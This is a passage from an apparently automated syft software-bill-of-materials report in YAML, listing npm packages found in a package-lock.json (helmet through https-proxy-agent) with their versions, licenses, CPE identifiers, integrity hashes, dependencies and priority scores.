ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: helmet 7.2.0'
|
|
title: helmet 7.2.0
|
|
description: 'Package discovered: helmet 7.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ad14b3d3d950e009
|
|
name: helmet
|
|
version: 7.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:helmet:helmet:7.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/helmet@7.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/helmet/-/helmet-7.2.0.tgz
|
|
integrity: sha512-ZRiwvN089JfMXokizgqEPXsl2Guk094yExfoDXR0cBYWxtBbaSww/w+vT4WEJsBW2iTUi1GgZ6swmoug3Oy4Xw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5ce7a5c301b19471
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: hsl-to-hex 1.0.0'
|
|
title: hsl-to-hex 1.0.0
|
|
description: 'Package discovered: hsl-to-hex 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5912401178cdcd30
|
|
name: hsl-to-hex
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:hsl-to-hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to-hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to_hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to_hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/hsl-to-hex@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/hsl-to-hex/-/hsl-to-hex-1.0.0.tgz
|
|
integrity: sha512-K6GVpucS5wFf44X0h2bLVRDsycgJmf9FF2elg+CrqD8GcFU8c6vYhgXn8NjUkFCwj+xDFb70qgLbTUm6sxwPmA==
|
|
dependencies:
|
|
hsl-to-rgb-for-reals: ^1.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 342f7c75e7dae76e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: hsl-to-rgb-for-reals 1.1.1'
|
|
title: hsl-to-rgb-for-reals 1.1.1
|
|
description: 'Package discovered: hsl-to-rgb-for-reals 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 52590567976abaf8
|
|
name: hsl-to-rgb-for-reals
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:hsl-to-rgb-for-reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to-rgb-for-reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to_rgb_for_reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to_rgb_for_reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to-rgb-for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to-rgb-for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to_rgb_for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to_rgb_for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to-rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to-rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to_rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to_rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl-to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl_to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:hsl:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/hsl-to-rgb-for-reals@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/hsl-to-rgb-for-reals/-/hsl-to-rgb-for-reals-1.1.1.tgz
|
|
integrity: sha512-LgOWAkrN0rFaQpfdWBQlv/VhkOxb5AsBjk6NQVx4yEzWS923T07X0M1Y0VNko2H52HeSpZrZNNMJ0aFqsdVzQg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9e434aef3ca36a26
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: html-entities 2.6.0'
|
|
title: html-entities 2.6.0
|
|
description: 'Package discovered: html-entities 2.6.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4d1e475b46ee4f29
|
|
name: html-entities
|
|
version: 2.6.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:html-entities:html-entities:2.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html-entities:html_entities:2.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html_entities:html-entities:2.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html_entities:html_entities:2.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html:html-entities:2.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html:html_entities:2.6.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/html-entities@2.6.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/html-entities/-/html-entities-2.6.0.tgz
|
|
integrity: sha512-kig+rMn/QOVRvr7c86gQ8lWXq+Hkv6CbAH1hLu+RG338StTpE8Z0b44SDVaqVu7HGKf27frdmUYEs9hTUX/cLQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 73fec784f0f7a1eb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: html-to-text 9.0.5'
|
|
title: html-to-text 9.0.5
|
|
description: 'Package discovered: html-to-text 9.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 41ee91a75a779a86
|
|
name: html-to-text
|
|
version: 9.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:html-to-text:html-to-text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html-to-text:html_to_text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html_to_text:html-to-text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html_to_text:html_to_text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html-to:html-to-text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html-to:html_to_text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html_to:html-to-text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html_to:html_to_text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html:html-to-text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:html:html_to_text:9.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/html-to-text@9.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/html-to-text/-/html-to-text-9.0.5.tgz
|
|
integrity: sha512-qY60FjREgVZL03vJU6IfMV4GDjGBIoOyvuFdpBDIX9yTlDw0TjxVBQp+P8NvpdIXNJvfWBTNul7fsAQJq2FNpg==
|
|
dependencies:
|
|
'@selderee/plugin-htmlparser2': ^0.11.0
|
|
deepmerge: ^4.3.1
|
|
dom-serializer: ^2.0.0
|
|
htmlparser2: ^8.0.2
|
|
selderee: ^0.11.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c43d43edb7287d6e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: htmlparser2 8.0.2'
|
|
title: htmlparser2 8.0.2
|
|
description: 'Package discovered: htmlparser2 8.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4a5b4c89e570771b
|
|
name: htmlparser2
|
|
version: 8.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:htmlparser2:htmlparser2:8.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/htmlparser2@8.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.2.tgz
|
|
integrity: sha512-GYdjWKDkbRLkZ5geuHs5NY1puJ+PXwP7+fHPRz06Eirsb9ugf6d8kkXav6ADhcODhFFPMIXyxkxSuMf3D6NCFA==
|
|
dependencies:
|
|
domelementtype: ^2.3.0
|
|
domhandler: ^5.0.3
|
|
domutils: ^3.0.1
|
|
entities: ^4.4.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f927a519c85962f3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: http-errors 2.0.1'
|
|
title: http-errors 2.0.1
|
|
description: 'Package discovered: http-errors 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bf2c5c4cccddf639
|
|
name: http-errors
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:http-errors:http-errors:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http-errors:http_errors:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_errors:http-errors:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_errors:http_errors:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http:http-errors:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http:http_errors:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/http-errors@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/http-errors/-/http-errors-2.0.1.tgz
|
|
integrity: sha512-4FbRdAX+bSdmo4AUFuS0WNiPz8NgFt+r8ThgNWmlrjQjt1Q7ZR9+zTlce2859x4KSXrwIsaeTqDoKQmtP8pLmQ==
|
|
dependencies:
|
|
depd: ~2.0.0
|
|
inherits: ~2.0.4
|
|
setprototypeof: ~1.2.0
|
|
statuses: ~2.0.2
|
|
toidentifier: ~1.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: af32118f21902d1f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: http-parser-js 0.5.10'
|
|
title: http-parser-js 0.5.10
|
|
description: 'Package discovered: http-parser-js 0.5.10'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b85e63dfe0c1efe8
|
|
name: http-parser-js
|
|
version: 0.5.10
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:http-parser-js:http-parser-js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http-parser-js:http_parser_js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_parser_js:http-parser-js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_parser_js:http_parser_js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http-parser:http-parser-js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http-parser:http_parser_js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_parser:http-parser-js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_parser:http_parser_js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http:http-parser-js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http:http_parser_js:0.5.10:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/http-parser-js@0.5.10
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz
|
|
integrity: sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2fd1314214cea39c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: http-proxy-agent 5.0.0'
|
|
title: http-proxy-agent 5.0.0
|
|
description: 'Package discovered: http-proxy-agent 5.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 91bc09c317f85f97
|
|
name: http-proxy-agent
|
|
version: 5.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:http-proxy-agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http-proxy-agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_proxy_agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_proxy_agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http-proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http-proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http_proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http:http-proxy-agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:http:http_proxy_agent:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/http-proxy-agent@5.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz
|
|
integrity: sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==
|
|
dependencies:
|
|
'@tootallnate/once': '2'
|
|
agent-base: '6'
|
|
debug: '4'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d375a13b9232535f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: https-proxy-agent 5.0.1'
|
|
title: https-proxy-agent 5.0.1
|
|
description: 'Package discovered: https-proxy-agent 5.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ac843d04db23cee1
|
|
name: https-proxy-agent
|
|
version: 5.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:5.0.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/https-proxy-agent@5.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz
|
|
integrity: sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==
|
|
dependencies:
|
|
agent-base: '6'
|
|
debug: '4'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
